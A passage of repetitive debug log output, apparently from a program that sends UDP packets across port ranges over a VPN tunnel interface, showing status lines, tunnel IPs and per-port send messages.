port range from 32010 to 32020 with udps.. +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Responding to all my own client probes to make sure they're kept in the table +arc twas: 7~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 1spreading the port range from 32010 to 32020 with udps.. +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Using tun src ip: 10.8.0.6 +Filling up vpn port range from 32010 to 32020.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 32010 to 32020 with udps.. +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Responding to all my own client probes to make sure they're kept in the table +arc twas: 7~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 1spreading the port range from 32010 to 32020 with udps.. +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Using tun src ip: 10.8.0.6 +Filling up vpn port range from 32010 to 32020.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 32010 to 32020 with udps.. +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Responding to all my own client probes to make sure they're kept in the table +arc twas: 7~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 1spreading the port range from 32010 to 32020 with udps.. +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Using tun src ip: 10.8.0.6 +Filling up vpn port range from 32010 to 32020.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 32010 to 32020 with udps.. +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Responding to all my own client probes to make sure they're kept in the table +arc twas: 7~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 1spreading the port range from 32010 to 32020 with udps.. +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Using tun src ip: 10.8.0.6 +Filling up vpn port range from 32010 to 32020.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 32010 to 32020 with udps.. +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Responding to all my own client probes to make sure they're kept in the table +arc twas: 7~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 1spreading the port range from 32010 to 32020 with udps.. +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Using tun src ip: 10.8.0.6 +Filling up vpn port range from 32010 to 32020.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 32010 to 32020 with udps.. +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Responding to all my own client probes to make sure they're kept in the table +arc twas: 7~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 1spreading the port range from 32010 to 32020 with udps.. +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Using tun src ip: 10.8.0.6 +Filling up vpn port range from 32010 to 32020.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 32010 to 32020 with udps.. +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Responding to all my own client probes to make sure they're kept in the table +arc twas: 7~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 1spreading the port range from 32010 to 32020 with udps.. +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Using tun src ip: 10.8.0.6 +Filling up vpn port range from 32010 to 32020.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 32010 to 32020 with udps.. +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Responding to all my own client probes to make sure they're kept in the table +arc twas: 7~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 1spreading the port range from 32010 to 32020 with udps.. +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Using tun src ip: 10.8.0.6 +Filling up vpn port range from 32010 to 32020.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 32010 to 32020 with udps.. +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Responding to all my own client probes to make sure they're kept in the table +arc twas: 7~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 1spreading the port range from 32010 to 32020 with udps.. +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 32010 to 32020.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 32010 to 32020 with udps.. +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Responding to all my own client probes to make sure they're kept in the table +arc twas: 7~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 1spreading the port range from 32010 to 32020 with udps.. +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 32010 to 32020.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 32010 to 32020 with udps.. +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Responding to all my own client probes to make sure they're kept in the table +arc twas: 7~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 1spreading the port range from 32010 to 32020 with udps.. +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 32010 to 32020.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 32010 to 32020 with udps.. +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Responding to all my own client probes to make sure they're kept in the table +arc twas: 7~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 1spreading the port range from 32010 to 32020 with udps.. +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Responding to all my own client probes to make sure they're kept in the table +arc twas: 7~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 1spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Responding to all my own client probes to make sure they're kept in the table +arc twas: 7~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 1spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Responding to all my own client probes to make sure they're kept in the table +arc twas: 7~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 1spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Responding to all my own client probes to make sure they're kept in the table +arc twas: 7~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 1spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Responding to all my own client probes to make sure they're kept in the table +arc twas: 